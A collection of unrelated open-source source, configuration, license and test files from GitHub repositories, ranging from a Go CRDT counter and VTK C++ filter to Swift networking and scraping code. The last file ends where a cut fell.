WS-I does incorporate some or all of your Feedback in a future version of the work, it may, but is not obligated to include your name (or, if you are identified as acting on behalf of your company, the name of your company) on a list of contributors to the work. If the foregoing is not acceptable to you and any company on whose behalf you are acting, please do not provide any Feedback. Feedback on this document should be directed to [email protected]. --> <xsd:schema targetNamespace="http://ws-i.org/profiles/basic/1.1/xsd" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <xsd:simpleType name="swaRef"> <xsd:restriction base="xsd:anyURI"/> </xsd:simpleType> </xsd:schema>
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: e57bf701e9cb4a94dadf8040bc7df0cd MonoImporter: externalObjects: {} serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
package api func (c *Sys) Leader() (*LeaderResponse, error) { r := c.c.NewRequest("GET", "/v1/sys/leader") resp, err := c.c.RawRequest(r) if err != nil { return nil, err } defer resp.Body.Close() var result LeaderResponse err = resp.DecodeJSON(&result) return &result, err } type LeaderResponse struct { HAEnabled bool `json:"ha_enabled"` IsSelf bool `json:"is_self"` LeaderAddress string `json:"leader_address"` }
{ "pile_set_name": "Github" }
/* * Copyright (c) 2011-2017, ScalaFX Project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of the ScalaFX Project nor the * names of its contributors may be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE SCALAFX PROJECT OR ITS CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package scalafx.scene.layout import javafx.scene.{layout => jfxsl} import scalafx.Includes._ import scalafx.testutil.SimpleSFXDelegateSpec /** * BorderPane Spec tests. * * */ class BorderPaneSpec extends SimpleSFXDelegateSpec[jfxsl.BorderPane, BorderPane](classOf[jfxsl.BorderPane], classOf[BorderPane])
{ "pile_set_name": "Github" }
import _plotly_utils.basevalidators class CustomdataValidator(_plotly_utils.basevalidators.DataArrayValidator): def __init__(self, plotly_name="customdata", parent_name="scattergl", **kwargs): super(CustomdataValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "data"), **kwargs )
{ "pile_set_name": "Github" }
MIT License Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta name="generator" content="Doxygen 1.8.17"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="defines_0.js"></script> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Loading...</div> <div id="SRResults"></div> <script type="text/javascript"><!-- /* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */ createResults(); /* @license-end */ --></script> <div class="SRStatus" id="Searching">Searching...</div> <div class="SRStatus" id="NoMatches">No Matches</div> <script type="text/javascript"><!-- /* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */ document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); /* @license-end */ --></script> </div> </body> </html>
{ "pile_set_name": "Github" }
/*========================================================================= Program: Visualization Toolkit Module: vtkMergeArrays.cxx Copyright (c) Kitware, Inc. All rights reserved. See Copyright.txt or http://www.paraview.org/HTML/Copyright.html for details. This software is distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the above copyright notice for more information. =========================================================================*/ #include "vtkMergeArrays.h" #include "vtkCellData.h" #include "vtkCompositeDataIterator.h" #include "vtkCompositeDataSet.h" #include "vtkDataArray.h" #include "vtkDataSet.h" #include "vtkFieldData.h" #include "vtkInformation.h" #include "vtkInformationVector.h" #include "vtkObjectFactory.h" #include "vtkPointData.h" #include "vtkSmartPointer.h" vtkStandardNewMacro(vtkMergeArrays); //------------------------------------------------------------------------------ vtkMergeArrays::vtkMergeArrays() = default; //------------------------------------------------------------------------------ vtkMergeArrays::~vtkMergeArrays() = default; //------------------------------------------------------------------------------ bool vtkMergeArrays::GetOutputArrayName( vtkFieldData* arrays, const char* arrayName, int inputIndex, std::string& outputArrayName) { if (arrays->GetAbstractArray(arrayName) == nullptr) { return false; } outputArrayName = std::string(arrayName) + "_input_" + std::to_string(inputIndex); return true; } //------------------------------------------------------------------------------ void vtkMergeArrays::MergeArrays(int inputIndex, vtkFieldData* inputFD, vtkFieldData* outputFD) { if (inputFD == nullptr || outputFD == nullptr) { return; } std::string outputArrayName; int numArrays = inputFD->GetNumberOfArrays(); for (int arrayIdx = 0; arrayIdx < numArrays; ++arrayIdx) { vtkAbstractArray* array = inputFD->GetAbstractArray(arrayIdx); if (this->GetOutputArrayName(outputFD, array->GetName(), inputIndex, outputArrayName)) { vtkAbstractArray* newArray = array->NewInstance(); if (vtkDataArray* newDataArray = vtkDataArray::SafeDownCast(newArray)) { newDataArray->ShallowCopy(vtkDataArray::SafeDownCast(array)); } else { newArray->DeepCopy(array); } newArray->SetName(outputArrayName.c_str()); outputFD->AddArray(newArray); newArray->FastDelete(); } else { outputFD->AddArray(array); } } } //------------------------------------------------------------------------------ int vtkMergeArrays::MergeDataObjectFields(vtkDataObject* input, int idx, vtkDataObject* output) { int checks[vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES]; for (int attr = 0; attr < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; attr++) { checks[attr] = output->GetNumberOfElements(attr) == input->GetNumberOfElements(attr) ? 0 : 1; } int globalChecks[vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES]; for (int i = 0; i < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; ++i) { globalChecks[i] = checks[i]; } for (int attr = 0; attr < vtkDataObject::NUMBER_OF_ATTRIBUTE_TYPES; attr++) { if (globalChecks[attr] == 0) { // only merge arrays when the number of elements in the input and output are the same this->MergeArrays( idx, input->GetAttributesAsFieldData(attr), output->GetAttributesAsFieldData(attr)); } } return 1; } //------------------------------------------------------------------------------ int vtkMergeArrays::FillInputPortInformation(int vtkNotUsed(port), vtkInformation* info) { info->Set(vtkAlgorithm::INPUT_IS_REPEATABLE(), 1); return 1; } //------------------------------------------------------------------------------ int vtkMergeArrays::RequestData(vtkInformation* vtkNotUsed(request), vtkInformationVector** inputVector, vtkInformationVector* outputVector) { int num = inputVector[0]->GetNumberOfInformationObjects(); if (num < 1) { return 0; } // get the output info object vtkInformation* outInfo = outputVector->GetInformationObject(0); vtkDataObject* output = outInfo->Get(vtkDataObject::DATA_OBJECT()); vtkInformation* inInfo = inputVector[0]->GetInformationObject(0); vtkDataObject* input = inInfo->Get(vtkDataObject::DATA_OBJECT()); vtkCompositeDataSet* cOutput = vtkCompositeDataSet::SafeDownCast(output); if (cOutput) { vtkCompositeDataSet* cInput = vtkCompositeDataSet::SafeDownCast(input); cOutput->CopyStructure(cInput); vtkSmartPointer<vtkCompositeDataIterator> iter; iter.TakeReference(cInput->NewIterator()); iter->InitTraversal(); for (; !iter->IsDoneWithTraversal(); iter->GoToNextItem()) { if (vtkDataSet* tmpIn = vtkDataSet::SafeDownCast(iter->GetCurrentDataObject())) { vtkDataSet* tmpOut = tmpIn->NewInstance(); tmpOut->ShallowCopy(tmpIn); cOutput->SetDataSet(iter, tmpOut); tmpOut->Delete(); } } } else { output->ShallowCopy(input); } for (int idx = 1; idx < num; ++idx) { inInfo = inputVector[0]->GetInformationObject(idx); input = inInfo->Get(vtkDataObject::DATA_OBJECT()); if (!this->MergeDataObjectFields(input, idx, output)) { return 0; } vtkCompositeDataSet* cInput = vtkCompositeDataSet::SafeDownCast(input); if (cOutput && cInput) { vtkSmartPointer<vtkCompositeDataIterator> iter; iter.TakeReference(cInput->NewIterator()); iter->InitTraversal(); for (; !iter->IsDoneWithTraversal(); iter->GoToNextItem()) { vtkDataObject* tmpIn = iter->GetCurrentDataObject(); vtkDataObject* tmpOut = cOutput->GetDataSet(iter); if (!this->MergeDataObjectFields(tmpIn, idx, tmpOut)) { return 0; } } } } return 1; } //------------------------------------------------------------------------------ void vtkMergeArrays::PrintSelf(ostream& os, vtkIndent indent) { this->Superclass::PrintSelf(os, indent); }
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------ // <auto-generated> // This code was generated by a tool. // Runtime Version:4.0.30319.34209 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // </auto-generated> //------------------------------------------------------------------------------ namespace Solid.Arduino { using System; /// <summary> /// A strongly-typed resource class, for looking up localized strings, etc. /// </summary> // This class was auto-generated by the StronglyTypedResourceBuilder // class via a tool like ResGen or Visual Studio. // To add or remove a member, edit your .ResX file then rerun ResGen // with the /str option, or rebuild your VS project. [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] internal class Messages { private static global::System.Resources.ResourceManager resourceMan; private static global::System.Globalization.CultureInfo resourceCulture; [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] internal Messages() { } /// <summary> /// Returns the cached ResourceManager instance used by this class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Resources.ResourceManager ResourceManager { get { if (object.ReferenceEquals(resourceMan, null)) { global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Solid.Arduino.Messages", typeof(Messages).Assembly); resourceMan = temp; } return resourceMan; } } /// <summary> /// Overrides the current thread's CurrentUICulture property for all /// resource lookups using this strongly typed resource class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Globalization.CultureInfo Culture { get { return resourceCulture; } set { resourceCulture = value; } } /// <summary> /// Looks up a localized string similar to Cannot convert non-BCD data.. /// </summary> internal static string ArgumentEx_CannotConvertBcd { get { return ResourceManager.GetString("ArgumentEx_CannotConvertBcd", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Channel number must be between 0 and 15.. /// </summary> internal static string ArgumentEx_ChannelRange0_15 { get { return ResourceManager.GetString("ArgumentEx_ChannelRange0_15", resourceCulture); } } /// <summary> /// Looks up a localized string similar to String must contain digits only.. /// </summary> internal static string ArgumentEx_DigitStringOnly { get { return ResourceManager.GetString("ArgumentEx_DigitStringOnly", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Address must be between 0 and 1,023.. /// </summary> internal static string ArgumentEx_I2cAddressRange { get { return ResourceManager.GetString("ArgumentEx_I2cAddressRange", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Interval must be between 0 and 16,383 milliseconds.. /// </summary> internal static string ArgumentEx_I2cInterval { get { return ResourceManager.GetString("ArgumentEx_I2cInterval", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Maximum pulse width must be between 0 and 16,383 milliseconds.. /// </summary> internal static string ArgumentEx_MaxPulseWidth { get { return ResourceManager.GetString("ArgumentEx_MaxPulseWidth", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Minimum pulse width is greater than maximum pulse width.. /// </summary> internal static string ArgumentEx_MinMaxPulse { get { return ResourceManager.GetString("ArgumentEx_MinMaxPulse", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Minimum pulse width must be between 0 and 16,383 milliseconds.. /// </summary> internal static string ArgumentEx_MinPulseWidth { get { return ResourceManager.GetString("ArgumentEx_MinPulseWidth", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Value cannot be negative.. /// </summary> internal static string ArgumentEx_NoNegativeValue { get { return ResourceManager.GetString("ArgumentEx_NoNegativeValue", resourceCulture); } } /// <summary> /// Looks up a localized string similar to String argument can not be null or empty.. /// </summary> internal static string ArgumentEx_NotNullOrEmpty { get { return ResourceManager.GetString("ArgumentEx_NotNullOrEmpty", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Pin number must be between 0 and 127.. /// </summary> internal static string ArgumentEx_PinRange0_127 { get { return ResourceManager.GetString("ArgumentEx_PinRange0_127", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Pin must be between 0 and 7.. /// </summary> internal static string ArgumentEx_PinRange0_7 { get { return ResourceManager.GetString("ArgumentEx_PinRange0_7", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Port number must be between 0 and 15.. /// </summary> internal static string ArgumentEx_PortRange0_15 { get { return ResourceManager.GetString("ArgumentEx_PortRange0_15", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Value must be greater than zero.. /// </summary> internal static string ArgumentEx_PositiveValue { get { return ResourceManager.GetString("ArgumentEx_PositiveValue", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Sampling interval must be between 0 and 16,383 milliseconds.. /// </summary> internal static string ArgumentEx_SamplingInterval { get { return ResourceManager.GetString("ArgumentEx_SamplingInterval", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Value must be between 0 and 16,383.. /// </summary> internal static string ArgumentEx_ValueRange0_16383 { get { return ResourceManager.GetString("ArgumentEx_ValueRange0_16383", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Value must be betwen 0 and 255.. /// </summary> internal static string ArgumentEx_ValueRange0_255 { get { return ResourceManager.GetString("ArgumentEx_ValueRange0_255", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Pin is not supported.. /// </summary> internal static string InvalidOpEx_PinNotSupported { get { return ResourceManager.GetString("InvalidOpEx_PinNotSupported", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Commandbyte {0:X} is not implemented.. /// </summary> internal static string NotImplementedEx_Command { get { return ResourceManager.GetString("NotImplementedEx_Command", resourceCulture); } } /// <summary> /// Looks up a localized string similar to The command parsing buffer is full.. /// </summary> internal static string OverflowEx_CmdBufferFull { get { return ResourceManager.GetString("OverflowEx_CmdBufferFull", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Received message queue is full.. /// </summary> internal static string OverflowEx_MsgBufferFull { get { return ResourceManager.GetString("OverflowEx_MsgBufferFull", resourceCulture); } } /// <summary> /// Looks up a localized string similar to The received strings buffer is full.. /// </summary> internal static string OverflowEx_StringBufferFull { get { return ResourceManager.GetString("OverflowEx_StringBufferFull", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Wait condition for {0} message timed out.. /// </summary> internal static string TimeoutEx_WaitMessage { get { return ResourceManager.GetString("TimeoutEx_WaitMessage", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Wait condition for string read in {0} mode timed out.. /// </summary> internal static string TimeoutEx_WaitStringRequest { get { return ResourceManager.GetString("TimeoutEx_WaitStringRequest", resourceCulture); } } } }
{ "pile_set_name": "Github" }
Connecting to: localhost:5001 Stopped at tests/debugger/do_list.js:15 (jerry-debugger) b do_list.js:18 Breakpoint 1 at tests/debugger/do_list.js:18 (jerry-debugger) b do_list.js:19 Breakpoint 2 at tests/debugger/do_list.js:19 (jerry-debugger) list === Active breakpoints === 1: tests/debugger/do_list.js:18 2: tests/debugger/do_list.js:19 (jerry-debugger) quit
{ "pile_set_name": "Github" }
package crdt import "github.com/satori/go.uuid" // GCounter represent a G-counter in CRDT, which is // a state-based grow-only counter that only supports // increments. type GCounter struct { // ident provides a unique identity to each replica. ident string // counter maps identity of each replica to their // entry values i.e. the counter value they individually // have. counter map[string]int } // NewGCounter returns a *GCounter by pre-assigning a unique // identity to it. func NewGCounter() *GCounter { return &GCounter{ ident: uuid.NewV4().String(), counter: make(map[string]int), } } // Inc increments the GCounter by the value of 1 everytime it // is called. func (g *GCounter) Inc() { g.IncVal(1) } // IncVal allows passing in an arbitrary delta to increment the // current value of counter by. Only positive values are accepted. // If a negative value is provided the implementation will panic. func (g *GCounter) IncVal(incr int) { if incr < 0 { panic("cannot decrement a gcounter") } g.counter[g.ident] += incr } // Count returns the total count of this counter across all the // present replicas. func (g *GCounter) Count() (total int) { for _, val := range g.counter { total += val } return } // Merge combines the counter values across multiple replicas. // The property of idempotency is preserved here across // multiple merges as when no state is changed across any replicas, // the result should be exactly the same everytime. func (g *GCounter) Merge(c *GCounter) { for ident, val := range c.counter { if v, ok := g.counter[ident]; !ok || v < val { g.counter[ident] = val } } }
{ "pile_set_name": "Github" }
# This is an empty schema designed to support # nulldb adapter's requirement for one to exist ActiveRecord::Schema.define(version: 1) do end
{ "pile_set_name": "Github" }
[package] name = "mc-crypto-box" version = "1.0.0" authors = ["MobileCoin"] edition = "2018" [dependencies] aead = "0.3" aes-gcm = { version = "0.6.0" } blake2 = { version = "0.9", default-features = false } digest = { version = "0.9" } failure = { version = "0.1.5", default-features = false } hkdf = { version = "0.9.0", default-features = false } mc-crypto-keys = { path = "../keys", default-features = false } rand_core = { version = "0.5", default-features = false } [dev_dependencies] mc-util-from-random = { path = "../../util/from-random" } mc-util-test-helper = { path = "../../util/test-helper" }
{ "pile_set_name": "Github" }
// // This file is part of the NineAnimator project. // // Copyright © 2018-2020 Marcus Zhou. All rights reserved. // // NineAnimator is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // NineAnimator is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with NineAnimator. If not, see <http://www.gnu.org/licenses/>. // import Foundation import SwiftSoup extension NASourceAnimeDao { func featured() -> NineAnimatorPromise<FeaturedContainer> { self.requestManager.request( url: endpointURL, handling: .browsing ) .responseString .then { responseContent in let bowl = try SwiftSoup.parse(responseContent) let updatedAnimeContainer = try bowl.select("#new") let featuredAnimeContainer = try bowl.select("#recent") let updatedAnimeList = try updatedAnimeContainer .select(">div") .compactMap { container -> AnimeLink? in if let imageContainer = try container.select("img").first(), let titleContainer = try container.select("a.latest-parent").first() { let animeTitle = titleContainer .ownText() .trimmingCharacters(in: .whitespacesAndNewlines) let animeUrl = try URL( string: try titleContainer.attr("href"), relativeTo: self.endpointURL ).tryUnwrap() let artworkUrl = try URL( string: try imageContainer.attr("data-src"), relativeTo: self.endpointURL ).tryUnwrap() // Construct and return the url return AnimeLink( title: animeTitle, link: animeUrl, image: artworkUrl, source: self ) } return nil } let featuredAnimeList = try featuredAnimeContainer .select(">div>div") .compactMap { container -> AnimeLink? in if let imageContainer = try container.select("img").first(), let titleContainer = try container.select(".ongoingtitle b").first(), let linkContainer = try container.select("a").first() { let animeTitle = titleContainer .ownText() .trimmingCharacters(in: .whitespacesAndNewlines) let animeUrl = try URL( string: try linkContainer.attr("href"), relativeTo: self.endpointURL ).tryUnwrap() let artworkUrl = try URL( string: try imageContainer.attr("data-src"), relativeTo: self.endpointURL ).tryUnwrap() // Construct and return the url return AnimeLink( title: animeTitle, link: animeUrl, image: artworkUrl, source: self ) } return nil } return BasicFeaturedContainer( featured: featuredAnimeList, latest: updatedAnimeList ) } } }
{ "pile_set_name": "Github" }
/* +----------------------------------------------------------------------+ | PHP Version 7 | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | [email protected] so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Kirti Velankar <[email protected]> | +----------------------------------------------------------------------+ */ /* $Id$ */ #ifndef LOCALE_LOCALE_H #define LOCALE_LOCALE_H #include <php.h> void locale_register_constants( INIT_FUNC_ARGS ); #define OPTION_DEFAULT NULL #define LOC_LANG_TAG "language" #define LOC_SCRIPT_TAG "script" #define LOC_REGION_TAG "region" #define LOC_VARIANT_TAG "variant" #define LOC_EXTLANG_TAG "extlang" #define LOC_GRANDFATHERED_LANG_TAG "grandfathered" #define LOC_PRIVATE_TAG "private" #define LOC_CANONICALIZE_TAG "canonicalize" #define LOCALE_INI_NAME "intl.default_locale" #endif // LOCALE_LOCALE_H
{ "pile_set_name": "Github" }
/* ****************************************************************************** * * Copyright (C) 1997-2012, International Business Machines * Corporation and others. All Rights Reserved. * ****************************************************************************** * * File CSTRING.H * * Contains CString interface * * @author Helena Shih * * Modification History: * * Date Name Description * 6/17/98 hshih Created. * 05/03/99 stephen Changed from functions to macros. * 06/14/99 stephen Added icu_strncat, icu_strncmp, icu_tolower * ****************************************************************************** */ #ifndef CSTRING_H #define CSTRING_H 1 #include "unicode/utypes.h" #include "cmemory.h" #include <string.h> #include <stdlib.h> #include <ctype.h> #define uprv_strcpy(dst, src) U_STANDARD_CPP_NAMESPACE strcpy(dst, src) #define uprv_strlen(str) U_STANDARD_CPP_NAMESPACE strlen(str) #define uprv_strcmp(s1, s2) U_STANDARD_CPP_NAMESPACE strcmp(s1, s2) #define uprv_strcat(dst, src) U_STANDARD_CPP_NAMESPACE strcat(dst, src) #define uprv_strchr(s, c) U_STANDARD_CPP_NAMESPACE strchr(s, c) #define uprv_strstr(s, c) U_STANDARD_CPP_NAMESPACE strstr(s, c) #define uprv_strrchr(s, c) U_STANDARD_CPP_NAMESPACE strrchr(s, c) #if U_DEBUG #define uprv_strncpy(dst, src, size) ( \ uprv_checkValidMemory(src, 1), \ U_STANDARD_CPP_NAMESPACE strncpy(dst, src, size)) #define uprv_strncmp(s1, s2, n) ( \ uprv_checkValidMemory(s1, 1), \ uprv_checkValidMemory(s2, 1), \ U_STANDARD_CPP_NAMESPACE strncmp(s1, s2, n)) #define uprv_strncat(dst, src, n) ( \ uprv_checkValidMemory(src, 1), \ U_STANDARD_CPP_NAMESPACE strncat(dst, src, n)) #else #define uprv_strncpy(dst, src, size) U_STANDARD_CPP_NAMESPACE strncpy(dst, src, size) #define uprv_strncmp(s1, s2, n) U_STANDARD_CPP_NAMESPACE strncmp(s1, s2, n) #define uprv_strncat(dst, src, n) U_STANDARD_CPP_NAMESPACE strncat(dst, src, n) #endif /* U_DEBUG */ /** * Is c an ASCII-repertoire letter a-z or A-Z? * Note: The implementation is specific to whether ICU is compiled for * an ASCII-based or EBCDIC-based machine. There just does not seem to be a better name for this. */ U_CAPI UBool U_EXPORT2 uprv_isASCIILetter(char c); U_CAPI char U_EXPORT2 uprv_toupper(char c); U_CAPI char U_EXPORT2 uprv_asciitolower(char c); U_CAPI char U_EXPORT2 uprv_ebcdictolower(char c); #if U_CHARSET_FAMILY==U_ASCII_FAMILY # define uprv_tolower uprv_asciitolower #elif U_CHARSET_FAMILY==U_EBCDIC_FAMILY # define uprv_tolower uprv_ebcdictolower #else # error U_CHARSET_FAMILY is not valid #endif #define uprv_strtod(source, end) U_STANDARD_CPP_NAMESPACE strtod(source, end) #define uprv_strtoul(str, end, base) U_STANDARD_CPP_NAMESPACE strtoul(str, end, base) #define uprv_strtol(str, end, base) U_STANDARD_CPP_NAMESPACE strtol(str, end, base) /* Conversion from a digit to the character with radix base from 2-19 */ /* May need to use U_UPPER_ORDINAL*/ #define T_CString_itosOffset(a) ((a)<=9?('0'+(a)):('A'+(a)-10)) U_CAPI char* U_EXPORT2 uprv_strdup(const char *src); /** * uprv_malloc n+1 bytes, and copy n bytes from src into the new string. * Terminate with a null at offset n. If n is -1, works like uprv_strdup * @param src * @param n length of the input string, not including null. * @return new string (owned by caller, use uprv_free to free). * @internal */ U_CAPI char* U_EXPORT2 uprv_strndup(const char *src, int32_t n); U_CAPI char* U_EXPORT2 T_CString_toLowerCase(char* str); U_CAPI char* U_EXPORT2 T_CString_toUpperCase(char* str); U_CAPI int32_t U_EXPORT2 T_CString_integerToString(char *buffer, int32_t n, int32_t radix); U_CAPI int32_t U_EXPORT2 T_CString_int64ToString(char *buffer, int64_t n, uint32_t radix); U_CAPI int32_t U_EXPORT2 T_CString_stringToInteger(const char *integerString, int32_t radix); /** * Case-insensitive, language-independent string comparison * limited to the ASCII character repertoire. */ U_CAPI int U_EXPORT2 uprv_stricmp(const char *str1, const char *str2); /** * Case-insensitive, language-independent string comparison * limited to the ASCII character repertoire. */ U_CAPI int U_EXPORT2 uprv_strnicmp(const char *str1, const char *str2, uint32_t n); #endif /* ! CSTRING_H */
{ "pile_set_name": "Github" }
// // Response.swift // // Copyright (c) 2014-2016 Alamofire Software Foundation (http://alamofire.org/) // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // import Foundation /// Used to store all data associated with an non-serialized response of a data or upload request. public struct DefaultDataResponse { /// The URL request sent to the server. public let request: URLRequest? /// The server's response to the URL request. public let response: HTTPURLResponse? /// The data returned by the server. public let data: Data? /// The error encountered while executing or validating the request. public let error: Error? /// The timeline of the complete lifecycle of the request. public let timeline: Timeline var _metrics: AnyObject? /// Creates a `DefaultDataResponse` instance from the specified parameters. /// /// - Parameters: /// - request: The URL request sent to the server. /// - response: The server's response to the URL request. /// - data: The data returned by the server. /// - error: The error encountered while executing or validating the request. /// - timeline: The timeline of the complete lifecycle of the request. `Timeline()` by default. /// - metrics: The task metrics containing the request / response statistics. `nil` by default. public init( request: URLRequest?, response: HTTPURLResponse?, data: Data?, error: Error?, timeline: Timeline = Timeline(), metrics: AnyObject? = nil) { self.request = request self.response = response self.data = data self.error = error self.timeline = timeline } } // MARK: - /// Used to store all data associated with a serialized response of a data or upload request. public struct DataResponse<Value> { /// The URL request sent to the server. public let request: URLRequest? /// The server's response to the URL request. public let response: HTTPURLResponse? /// The data returned by the server. public let data: Data? /// The result of response serialization. public let result: Result<Value> /// The timeline of the complete lifecycle of the request. public let timeline: Timeline /// Returns the associated value of the result if it is a success, `nil` otherwise. public var value: Value? { return result.value } /// Returns the associated error value if the result if it is a failure, `nil` otherwise. public var error: Error? { return result.error } var _metrics: AnyObject? /// Creates a `DataResponse` instance with the specified parameters derived from response serialization. /// /// - parameter request: The URL request sent to the server. /// - parameter response: The server's response to the URL request. /// - parameter data: The data returned by the server. /// - parameter result: The result of response serialization. /// - parameter timeline: The timeline of the complete lifecycle of the `Request`. Defaults to `Timeline()`. /// /// - returns: The new `DataResponse` instance. public init( request: URLRequest?, response: HTTPURLResponse?, data: Data?, result: Result<Value>, timeline: Timeline = Timeline()) { self.request = request self.response = response self.data = data self.result = result self.timeline = timeline } } // MARK: - extension DataResponse: CustomStringConvertible, 